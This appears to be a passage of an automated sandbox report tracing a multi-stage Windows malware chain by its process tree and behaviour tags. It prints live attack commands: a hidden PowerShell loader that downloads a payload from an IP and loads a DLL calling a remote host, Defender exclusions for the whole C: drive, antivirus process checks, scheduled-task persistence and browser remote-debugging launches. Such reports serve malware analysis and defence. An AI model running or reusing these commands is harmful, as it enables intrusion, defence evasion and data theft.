pid Process 1588 1P27l3.exe 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 5564 msedge.exe 5564 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3456 wrote to memory of 3060 3456 random.exe 87 PID 3456 wrote to memory of 3060 3456 random.exe 87 PID 3456 wrote to memory of 3060 3456 random.exe 87 PID 3060 wrote to memory of 1588 3060 G8U31.exe 89 PID 3060 wrote to memory of 1588 3060 G8U31.exe 89 PID 3060 wrote to memory of 1588 3060 G8U31.exe 89 PID 1588 wrote to memory of 1236 1588 1P27l3.exe 91 PID 1588 wrote to memory of 1236 1588 1P27l3.exe 91 PID 1588 wrote to memory of 1236 1588 1P27l3.exe 91 PID 3060 wrote to memory of 2476 3060 G8U31.exe 92 PID 3060 wrote to memory of 2476 3060 G8U31.exe 92 PID 3060 wrote to memory of 2476 3060 G8U31.exe 92 PID 3456 wrote to memory of 3112 3456 random.exe 96 PID 3456 wrote to memory of 3112 3456 random.exe 96 PID 3456 wrote to memory of 3112 3456 random.exe 96 PID 1236 wrote to memory of 4848 1236 rapes.exe 100 PID 1236 wrote to memory of 4848 1236 rapes.exe 100 PID 4848 wrote to memory of 5028 4848 50KfF6O.exe 102 PID 4848 wrote to memory of 5028 4848 50KfF6O.exe 102 PID 1236 wrote to memory of 4464 1236 rapes.exe 104 PID 1236 wrote to memory of 4464 1236 rapes.exe 104 PID 1236 wrote to memory of 4464 1236 rapes.exe 104 PID 4464 wrote to memory of 3844 4464 zx4PJh6.exe 105 PID 4464 wrote to memory of 3844 4464 zx4PJh6.exe 105 PID 4464 wrote to memory of 3844 4464 zx4PJh6.exe 105 PID 3844 wrote to memory of 1900 3844 CMD.exe 107 PID 3844 wrote to memory of 1900 3844 CMD.exe 107 PID 3844 wrote to memory of 1900 3844 CMD.exe 107 PID 3844 wrote to memory of 4720 3844 CMD.exe 108 PID 3844 wrote to memory of 4720 3844 CMD.exe 108 PID 3844 wrote to memory of 4720 3844 CMD.exe 108 PID 3844 wrote to memory of 4032 3844 CMD.exe 109 PID 3844 wrote to memory of 4032 3844 CMD.exe 109 PID 3844 wrote to memory of 4032 3844 CMD.exe 109 PID 3844 wrote to memory of 3776 3844 CMD.exe 110 PID 3844 wrote to memory of 3776 3844 CMD.exe 110 PID 3844 wrote to memory of 3776 3844 CMD.exe 110 PID 3844 wrote to memory of 2972 3844 CMD.exe 111 PID 3844 wrote to memory of 2972 3844 CMD.exe 111 PID 3844 wrote to memory of 2972 3844 CMD.exe 111 PID 3844 wrote to memory of 1156 3844 CMD.exe 112 PID 3844 wrote to memory of 1156 3844 CMD.exe 112 PID 3844 wrote to memory of 1156 3844 CMD.exe 112 PID 3844 wrote to memory of 1228 3844 CMD.exe 113 PID 3844 wrote to memory of 1228 3844 CMD.exe 113 PID 3844 wrote to memory of 1228 3844 CMD.exe 113 PID 3844 wrote to memory of 2764 3844 CMD.exe 114 PID 3844 wrote to memory of 2764 3844 CMD.exe 114 PID 3844 wrote to memory of 2764 3844 CMD.exe 114 PID 3844 wrote to memory of 4568 3844 CMD.exe 115 PID 3844 wrote to memory of 4568 3844 CMD.exe 115 PID 3844 wrote to memory of 4568 3844 CMD.exe 115 PID 3844 wrote to memory of 3300 3844 CMD.exe 116 PID 3844 wrote to memory of 3300 3844 CMD.exe 116 PID 3844 wrote to memory of 3300 3844 CMD.exe 116 PID 3844 wrote to memory of 4360 3844 CMD.exe 117 PID 3844 wrote to memory of 4360 3844 CMD.exe 117 PID 3844 wrote to memory of 4360 3844 CMD.exe 117 PID 1236 wrote to memory of 2000 1236 rapes.exe 118 PID 1236 wrote to memory of 2000 1236 rapes.exe 118 PID 1236 wrote to memory of 2000 1236 rapes.exe 118 PID 1236 wrote to memory of 4584 1236 rapes.exe 121 PID 1236 wrote to memory of 4584 1236 rapes.exe 121 PID 1236 wrote to memory of 4584 1236 rapes.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5028 attrib.exe 8160 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:1356
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4164
-
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe"C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe6⤵
- Views/modifies file attributes
PID:5028
-
-
-
C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"7⤵
- System Location Discovery: System Language Discovery
PID:4720
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"7⤵
- System Location Discovery: System Language Discovery
PID:3776
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4408247⤵
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Architecture.wmv7⤵
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Offensive" Inter7⤵
- System Location Discovery: System Language Discovery
PID:1228
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com7⤵
- System Location Discovery: System Language Discovery
PID:2764
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h7⤵
- System Location Discovery: System Language Discovery
PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\440824\Organizations.comOrganizations.com h7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 10008⤵
- Program crash
PID:5188
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵
- System Location Discovery: System Language Discovery
PID:4360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "6⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:5600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6000
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5676
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2D45.tmp"6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5708
-
-
C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4584 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4844 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9665edcf8,0x7ff9665edd04,0x7ff9665edd107⤵PID:1512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1948,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1952 /prefetch:27⤵PID:3060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2292 /prefetch:37⤵PID:3572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2568 /prefetch:87⤵PID:3964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:17⤵
- Uses browser remote debugging
PID:3168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2904,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3328 /prefetch:17⤵
- Uses browser remote debugging
PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4076,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4108 /prefetch:27⤵
- Uses browser remote debugging
PID:1572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4584,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:17⤵
- Uses browser remote debugging
PID:4808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5356,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5368 /prefetch:87⤵PID:5504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,13781135567028376912,4066413048319866430,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5412 /prefetch:87⤵PID:5560
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
PID:1596 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5564 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x264,0x7ff96004f208,0x7ff96004f214,0x7ff96004f2208⤵PID:6100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:38⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2164,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:28⤵PID:5536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2488,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:88⤵PID:5044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:18⤵
- Uses browser remote debugging
PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:18⤵
- Uses browser remote debugging
PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4196,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:18⤵
- Uses browser remote debugging
PID:1748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4228,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:28⤵
- Uses browser remote debugging
PID:5008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3740,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:88⤵PID:3752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5252,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=3696 /prefetch:88⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5244,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=4936 /prefetch:88⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5416,i,10689377643609736646,13795444224247991530,262144 --variations-seed-version --mojo-platform-channel-handle=5548 /prefetch:88⤵PID:2980
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\wt26p" & exit6⤵
- System Location Discovery: System Language Discovery
PID:2244 -
C:\Windows\SysWOW64\timeout.exetimeout /t 117⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe"C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4924
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10288540141\4wAPcC0.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408 -
C:\Windows\system32\windowspowershell\v1.0\powershell.exe"C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe"6⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5620
-
-
-
C:\Users\Admin\AppData\Local\Temp\10288740101\Kr9UTz2.exe"C:\Users\Admin\AppData\Local\Temp\10288740101\Kr9UTz2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5960 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2644
-
-
-
C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5868 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5756
-
-
-
C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe"C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe"5⤵
- Executes dropped EXE
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\onefile_1524_133871210821058361\windowscore.exeC:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5920
-
-
-
C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe"C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5580
-
-
C:\Program Files\RuntimeApp\0000000439.exe"C:\Program Files\RuntimeApp\0000000439.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5524
-
-
-
C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe"C:\Users\Admin\AppData\Local\Temp\10297860101\d3jhg_003.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5304 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'6⤵PID:5200
-
